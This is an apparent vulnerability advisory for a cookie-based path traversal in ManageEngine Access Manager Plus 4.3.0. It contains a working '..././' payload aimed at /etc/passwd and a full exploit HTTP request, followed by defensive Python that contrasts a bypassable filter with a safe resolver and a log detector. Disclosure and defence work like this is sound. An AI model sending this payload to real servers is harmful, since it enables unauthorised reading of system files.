ManageEngine Access Manager Plus 4.3.0 Path Traversal
ManageEngine Access Manager Plus version 4.3.0 suffers from a path traversal vulnerability.
## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal
## Author: nu11secur1ty
## Date: 11.22.2023
## Vendor: https://www.manageengine.com/
## Software: https://www.manageengine.com/privileged-session-management/download.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)

## Description:
The `pmpcc` cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The testing payload

```
..././..././..././..././..././..././..././..././..././..././etc/passwd
```

was submitted in the `pmpcc` cookie. The requested file was returned in the application's response. The attacker can easily see all the JS structures of the server and can perform very dangerous actions.

## STATUS: HIGH Vulnerability

[+] Exploits:

```GET
GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1
Host: localhost:9292
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd; _zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a; JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E; JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Mobile: ?0
X-Requested-With: XMLHttpRequest
Sec-CH-UA-Platform: Windows
Referer: https://localhost:9292/AMPHome.html
```

[+] Response: the application's localized JS string table (keys from `js.pmp.helpCertRequest.subcontent10` through `pmp.vct.User_Audit_Configuration`, several thousand characters), not reproduced here.

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))

## Reference:
[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)

## Proof and Exploit:
[href](https://streamable.com/scdzsb)

## Time spent
`03:00:00`
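Defensive illustration added to this write-up (not code from the advisory or from ManageEngine): a small Python model of why the `..././` payload above survives a hypothetical single-pass `../` strip, how a canonicalise-then-compare check behaves on the same input, and a cookie check usable for proxy-log or WAF review. `BASE_DIR`, the function names and the session id are assumptions, not the product's own.

```python
# Added example, not code from the advisory or from ManageEngine. The one-pass
# "../" strip is a hypothetical filter of the kind a "..././" payload is shaped
# to slip past; the install root, function names and session id are made up.
import posixpath
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/opt/amp/webapps/AMP"             # hypothetical install root
PAYLOAD = "...%2f.%2f" * 10 + "etc%2fpasswd"  # pmpcc value from the advisory


def naive_resolve(cookie_value: str) -> str:
    """Broken sanitiser: decode, strip '../' once, join under BASE_DIR.
    A single pass turns each '..././' into '../', so traversal survives."""
    cleaned = unquote(cookie_value).replace("../", "")
    return posixpath.normpath(posixpath.join(BASE_DIR, cleaned))


def safe_resolve(cookie_value: str) -> Optional[str]:
    """Canonicalise first, then require the result to stay under BASE_DIR.
    Returns None if the path escapes or is absolute. Note that '..././'
    canonicalises to a harmless subdirectory literally named '...', which is
    why it only becomes dangerous after a strip-based filter mangles it.
    Symlink resolution is out of scope for this toy."""
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, unquote(cookie_value)))
    if candidate == BASE_DIR or candidate.startswith(BASE_DIR + "/"):
        return candidate
    return None


def cookie_has_traversal(cookie_header: str, name: str = "pmpcc") -> bool:
    """Detection helper for proxy logs or a WAF rule: decode the named cookie
    (twice, to catch double encoding) and flag any path segment made only of
    two or more dots ('..', '...', ...). No real path component looks like
    that, so the check has few false positives."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key != name:
            continue
        segments = unquote(unquote(value)).replace("\\", "/").split("/")
        return any(len(s) >= 2 and set(s) == {"."} for s in segments)
    return False


# Constructed Cookie header reusing the advisory's pmpcc value.
COOKIE_HEADER = f"pmpcc={PAYLOAD}; JSESSIONID=constructed-session-id"

if __name__ == "__main__":
    print("naive :", naive_resolve(PAYLOAD))             # /etc/passwd
    print("safe  :", safe_resolve(PAYLOAD))              # stays under BASE_DIR
    print("flag  :", cookie_has_traversal(COOKIE_HEADER))  # True
```

The plain `../` form is neutralised by the naive strip while `..././` is not, which is exactly the difference the advisory's payload choice exploits; the canonical check and the dot-segment detector treat both forms correctly.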